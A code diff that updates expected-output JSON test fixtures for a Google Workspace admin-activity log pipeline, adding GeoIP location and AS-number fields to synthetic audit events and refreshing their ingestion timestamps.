@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510411800Z", + "ingested": "2021-12-14T14:44:23.822101483Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "TRANSFER_DOCUMENT_OWNERSHIP", @@ -94,6 +106,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -103,7 +127,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510420800Z", + "ingested": "2021-12-14T14:44:23.822103637Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"DRIVE_DATA_RESTORE\",\"parameters\":[{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "start": "2002-10-02T12:00:00.000Z", 
@@ -159,6 +183,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -168,7 +204,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.510426300Z", + "ingested": "2021-12-14T14:44:23.822104130Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"CHANGE_DOCS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_DOCS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json index e9f2d74ccfc..096de2da5a8 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-domain.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915758200Z", + "ingested": "2021-12-14T14:44:24.297915967Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ACCOUNT_AUTO_RENEWAL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"NON_AUTO_RENEWAL\"}]}}", "provider": "admin", "action": "CHANGE_ACCOUNT_AUTO_RENEWAL", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915761700Z", + "ingested": "2021-12-14T14:44:24.297918300Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION", 
@@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915767800Z", + "ingested": "2021-12-14T14:44:24.297918820Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "ADD_APPLICATION_TO_WHITELIST", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915773500Z", + "ingested": "2021-12-14T14:44:24.297919157Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ADVERTISEMENT_OPTION", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915778400Z", + "ingested": "2021-12-14T14:44:24.297919495Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CREATE_ALERT", @@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915782300Z", + "ingested": "2021-12-14T14:44:24.297919855Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CHANGE_ALERT_CRITERIA", @@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915787Z", + "ingested": "2021-12-14T14:44:24.297920184Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "DELETE_ALERT", @@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915790700Z", + "ingested": "2021-12-14T14:44:24.297920578Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_RECEIVERS_CHANGED", @@ -544,6 +640,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -553,7 +661,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915795200Z", + "ingested": "2021-12-14T14:44:24.297920912Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_ALERT", @@ -608,6 +716,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -617,7 +737,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915799500Z", + "ingested": "2021-12-14T14:44:24.297921254Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_STATUS_CHANGED", @@ -672,6 +792,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -681,7 +813,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915803800Z", + "ingested": "2021-12-14T14:44:24.297921587Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_DOMAIN_ALIAS", @@ -736,6 +868,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -745,7 +889,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915807600Z", + "ingested": "2021-12-14T14:44:24.297922191Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_DOMAIN_ALIAS", @@ -800,6 +944,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -809,7 +965,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915812400Z", + "ingested": "2021-12-14T14:44:24.297922551Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "SKIP_DOMAIN_ALIAS_MX", @@ -864,6 +1020,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -873,7 +1041,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915816300Z", + "ingested": "2021-12-14T14:44:24.297922893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS_MX", @@ -928,6 +1096,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -937,7 +1117,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915821100Z", + "ingested": "2021-12-14T14:44:24.297923228Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS", 
@@ -992,6 +1172,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1001,7 +1193,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915826900Z", + "ingested": "2021-12-14T14:44:24.297923557Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", @@ -1057,6 +1249,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1066,7 +1270,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915832800Z", + "ingested": "2021-12-14T14:44:24.297924104Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_ALLOW_ADMIN_PASSWORD_RESET", 
@@ -1122,6 +1326,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1131,7 +1347,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915838700Z", + "ingested": "2021-12-14T14:44:24.297924441Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}", "provider": "admin", "action": "ENABLE_API_ACCESS", @@ -1187,6 +1403,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1196,7 +1424,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915844500Z", + "ingested": "2021-12-14T14:44:24.297924778Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}", "provider": "admin", "action": "AUTHORIZE_API_CLIENT_ACCESS", @@ -1251,6 +1479,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1260,7 +1500,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915850200Z", + "ingested": "2021-12-14T14:44:24.297925112Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}", "provider": "admin", "action": "REMOVE_API_CLIENT_ACCESS", 
@@ -1315,6 +1555,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1324,7 +1576,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915855800Z", + "ingested": "2021-12-14T14:44:24.297925442Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", "provider": "admin", "action": "CHROME_LICENSES_REDEEMED", @@ -1379,6 +1631,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1388,7 +1652,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915861500Z", + "ingested": "2021-12-14T14:44:24.297925843Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_AUTO_ADD_NEW_SERVICE", @@ -1443,6 +1707,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1452,7 +1728,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.915867400Z", + "ingested": "2021-12-14T14:44:24.297926176Z", "original": 